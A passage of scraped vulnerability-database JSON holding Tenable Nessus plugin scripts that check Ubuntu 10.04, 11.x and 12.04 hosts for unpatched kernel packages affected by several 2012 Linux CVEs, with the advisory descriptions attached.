\"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(10\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 10.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-2.6.32-348-ec2\", pkgver:\"2.6.32-348.54\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-2.6-ec2\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:17:40", "bulletinFamily": "scanner", "description": "Ben Hutchings reported a flaw in the Linux kernel with some network drivers that support TSO (TCP segment offload). A local or peer user could exploit this flaw to to cause a denial of service.\n(CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel implementation of RDS sockets. A local unprivileged user could potentially use this flaw to read privileged information from the kernel. (CVE-2012-3430)\n\nA flaw was discovered in the madvise feature of the Linux kernel's memory subsystem. An unprivileged local use could exploit the flaw to cause a denial of service (crash the system). (CVE-2012-3511).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-01T00:00:00", "id": "UBUNTU_USN-1572-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=62199", "published": "2012-09-19T00:00:00", "title": "Ubuntu 10.04 LTS : linux vulnerabilities (USN-1572-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1572-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(62199);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/12/01 13:19:07\");\n\n script_cve_id(\"CVE-2012-3412\", \"CVE-2012-3430\", \"CVE-2012-3511\");\n script_xref(name:\"USN\", value:\"1572-1\");\n\n script_name(english:\"Ubuntu 10.04 LTS : linux vulnerabilities (USN-1572-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Ben Hutchings reported a flaw in the Linux kernel with some network\ndrivers that support TSO (TCP segment offload). A local or peer user\ncould exploit this flaw to to cause a denial of service.\n(CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel\nimplementation of RDS sockets. A local unprivileged user could\npotentially use this flaw to read privileged information from the\nkernel. (CVE-2012-3430)\n\nA flaw was discovered in the madvise feature of the Linux kernel's\nmemory subsystem. An unprivileged local use could exploit the flaw to\ncause a denial of service (crash the system). (CVE-2012-3511).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1572-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-generic-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-lpia\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-preempt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-versatile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/09/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2012-2018 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(10\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 10.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-2.6.32-43-386\", pkgver:\"2.6.32-43.97\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-2.6.32-43-generic\", pkgver:\"2.6.32-43.97\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-2.6.32-43-generic-pae\", pkgver:\"2.6.32-43.97\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-2.6.32-43-lpia\", pkgver:\"2.6.32-43.97\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-2.6.32-43-preempt\", pkgver:\"2.6.32-43.97\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-2.6.32-43-server\", pkgver:\"2.6.32-43.97\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-2.6.32-43-versatile\", pkgver:\"2.6.32-43.97\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-2.6.32-43-virtual\", pkgver:\"2.6.32-43.97\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-2.6-386 / linux-image-2.6-generic / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:17:40", "bulletinFamily": "scanner", "description": "Ben Hutchings reported a flaw in the Linux kernel with some network drivers that support TSO (TCP segment offload). A local or peer user could exploit this flaw to to cause a denial of service.\n(CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel implementation of RDS sockets. A local unprivileged user could potentially use this flaw to read privileged information from the kernel. (CVE-2012-3430).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-01T00:00:00", "id": "UBUNTU_USN-1575-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=62212", "published": "2012-09-20T00:00:00", "title": "Ubuntu 10.04 LTS : linux-lts-backport-oneiric vulnerabilities (USN-1575-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1575-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(62212);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/12/01 13:19:07\");\n\n script_cve_id(\"CVE-2012-3412\", \"CVE-2012-3430\");\n script_bugtraq_id(54702, 54763);\n script_xref(name:\"USN\", value:\"1575-1\");\n\n script_name(english:\"Ubuntu 10.04 LTS : linux-lts-backport-oneiric vulnerabilities (USN-1575-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Ben Hutchings reported a flaw in the Linux kernel with some network\ndrivers that support TSO (TCP segment offload). A local or peer user\ncould exploit this flaw to to cause a denial of service.\n(CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel\nimplementation of RDS sockets. A local unprivileged user could\npotentially use this flaw to read privileged information from the\nkernel. (CVE-2012-3430).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1575-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.0-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.0-generic-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.0-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.0-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/09/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2012-2018 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(10\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 10.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-3.0.0-26-generic\", pkgver:\"3.0.0-26.42~lucid1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-3.0.0-26-generic-pae\", pkgver:\"3.0.0-26.42~lucid1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-3.0.0-26-server\", pkgver:\"3.0.0-26.42~lucid1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-3.0.0-26-virtual\", pkgver:\"3.0.0-26.42~lucid1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.0-generic / linux-image-3.0-generic-pae / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:17:41", "bulletinFamily": "scanner", "description": "Ben Hutchings reported a flaw in the Linux kernel with some network drivers that support TSO (TCP segment offload). A local or peer user could exploit this flaw to to cause a denial of service.\n(CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel implementation of RDS sockets. A local unprivileged user could potentially use this flaw to read privileged information from the kernel. (CVE-2012-3430).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2019-01-02T00:00:00", "id": "UBUNTU_USN-1579-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=62240", "published": "2012-09-24T00:00:00", "title": "Ubuntu 12.04 LTS : linux vulnerabilities (USN-1579-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1579-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(62240);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/01/02 16:37:56\");\n\n script_cve_id(\"CVE-2012-3412\", \"CVE-2012-3430\");\n script_bugtraq_id(54702, 54763);\n script_xref(name:\"USN\", value:\"1579-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS : linux vulnerabilities (USN-1579-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Ben Hutchings reported a flaw in the Linux kernel with some network\ndrivers that support TSO (TCP segment offload). A local or peer user\ncould exploit this flaw to to cause a denial of service.\n(CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel\nimplementation of RDS sockets. A local unprivileged user could\npotentially use this flaw to read privileged information from the\nkernel. (CVE-2012-3430).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1579-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-highbank\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/09/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2012-2019 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-31-generic\", pkgver:\"3.2.0-31.50\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-31-generic-pae\", pkgver:\"3.2.0-31.50\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-31-highbank\", pkgver:\"3.2.0-31.50\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-31-virtual\", pkgver:\"3.2.0-31.50\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.2-generic / linux-image-3.2-generic-pae / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:17:41", "bulletinFamily": "scanner", "description": "Ben Hutchings reported a flaw in the Linux kernel with some network drivers that support TSO (TCP segment offload). A local or peer user could exploit this flaw to to cause a denial of service.\n(CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel implementation of RDS sockets. A local unprivileged user could potentially use this flaw to read privileged information from the kernel. (CVE-2012-3430)", "modified": "2016-12-01T00:00:00", "id": "UBUNTU_USN-1578-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=62239", "published": "2012-09-24T00:00:00", "title": "USN-1578-1 : linux-ti-omap4 vulnerabilities", "type": "nessus", "sourceData": "# This script was automatically generated from Ubuntu Security\n# Notice USN-1578-1. It is released under the Nessus Script \n# Licence.\n#\n# Ubuntu Security Notices are (C) Canonical, Inc.\n# See http://www.ubuntu.com/usn/\n# Ubuntu(R) is a registered trademark of Canonical, Inc.\n\nif (!defined_func(\"bn_random\")) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(62239);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2016/12/01 20:56:51 $\");\n\n script_cve_id(\"CVE-2012-3412\", \"CVE-2012-3430\");\n script_xref(name:\"USN\", value:\"1578-1\");\n\n script_name(english:\"USN-1578-1 : linux-ti-omap4 vulnerabilities\");\n script_summary(english:\"Checks dpkg output for updated package(s)\");\n\n script_set_attribute(attribute:\"synopsis\", value: \n\"The remote Ubuntu host is missing one or more security-related\npatches.\");\n script_set_attribute(attribute:\"description\", value:\n\"Ben Hutchings reported a flaw in the Linux kernel with some network\ndrivers that support TSO (TCP segment offload). A local or peer user\ncould exploit this flaw to to cause a denial of service.\n(CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel\nimplementation of RDS sockets. A local unprivileged user could\npotentially use this flaw to read privileged information from the\nkernel. (CVE-2012-3430)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.ubuntu.com/usn/usn-1578-1/\");\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package(s).\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/09/21\");\n\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/24\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(\"Ubuntu Security Notice (C) 2012 Canonical, Inc. / NASL script (C) 2012-2016 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude(\"ubuntu.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/Ubuntu/release\")) exit(0, \"The host is not running Ubuntu.\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) exit(1, \"Could not obtain the list of installed packages.\");\n\nflag = 0;\n\nif (ubuntu_check(osver:\"11.10\", pkgname:\"linux-image-3.0.0-1216-omap4\", pkgver:\"3.0.0-1216.28\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:ubuntu_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:17:41", "bulletinFamily": "scanner", "description": "A flaw was discovered in the Linux kernel's KVM (kernel virtual machine). An administrative user in the guest OS could leverage this flaw to cause a denial of service in the host OS. (CVE-2012-2121)\n\nBen Hutchings reported a flaw in the Linux kernel with some network drivers that support TSO (TCP segment offload). A local or peer user could exploit this flaw to to cause a denial of service.\n(CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel implementation of RDS sockets. A local unprivileged user could potentially use this flaw to read privileged information from the kernel. (CVE-2012-3430)\n\nA flaw was discovered in the madvise feature of the Linux kernel's memory subsystem. An unprivileged local use could exploit the flaw to cause a denial of service (crash the system). (CVE-2012-3511)", "modified": "2016-12-01T00:00:00", "id": "UBUNTU_USN-1577-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=62238", "published": "2012-09-24T00:00:00", "title": "USN-1577-1 : linux-ti-omap4 vulnerabilities", "type": "nessus", "sourceData": "# This script was automatically generated from Ubuntu Security\n# Notice USN-1577-1. It is released under the Nessus Script \n# Licence.\n#\n# Ubuntu Security Notices are (C) Canonical, Inc.\n# See http://www.ubuntu.com/usn/\n# Ubuntu(R) is a registered trademark of Canonical, Inc.\n\nif (!defined_func(\"bn_random\")) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(62238);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2016/12/01 20:56:51 $\");\n\n script_cve_id(\"CVE-2012-2121\", \"CVE-2012-3412\", \"CVE-2012-3430\", \"CVE-2012-3511\");\n script_xref(name:\"USN\", value:\"1577-1\");\n\n script_name(english:\"USN-1577-1 : linux-ti-omap4 vulnerabilities\");\n script_summary(english:\"Checks dpkg output for updated package(s)\");\n\n script_set_attribute(attribute:\"synopsis\", value: \n\"The remote Ubuntu host is missing one or more security-related\npatches.\");\n script_set_attribute(attribute:\"description\", value:\n\"A flaw was discovered in the Linux kernel's KVM (kernel virtual\nmachine). An administrative user in the guest OS could leverage this\nflaw to cause a denial of service in the host OS. (CVE-2012-2121)\n\nBen Hutchings reported a flaw in the Linux kernel with some network\ndrivers that support TSO (TCP segment offload). A local or peer user\ncould exploit this flaw to to cause a denial of service.\n(CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel\nimplementation of RDS sockets. A local unprivileged user could\npotentially use this flaw to read privileged information from the\nkernel. (CVE-2012-3430)\n\nA flaw was discovered in the madvise feature of the Linux kernel's\nmemory subsystem. An unprivileged local use could exploit the flaw to\ncause a denial of service (crash the system). (CVE-2012-3511)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.ubuntu.com/usn/usn-1577-1/\");\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package(s).\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/09/21\");\n\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/24\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(\"Ubuntu Security Notice (C) 2012 Canonical, Inc. / NASL script (C) 2012-2016 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude(\"ubuntu.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/Ubuntu/release\")) exit(0, \"The host is not running Ubuntu.\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) exit(1, \"Could not obtain the list of installed packages.\");\n\nflag = 0;\n\nif (ubuntu_check(osver:\"11.04\", pkgname:\"linux-image-2.6.38-1209-omap4\", pkgver:\"2.6.38-1209.26\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:ubuntu_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:17:39", "bulletinFamily": "scanner", "description": "Ben Hutchings reported a flaw in the Linux kernel with some network drivers that support TSO (TCP segment offload). A local or peer user could exploit this flaw to to cause a denial of service.\n(CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel implementation of RDS sockets. A local 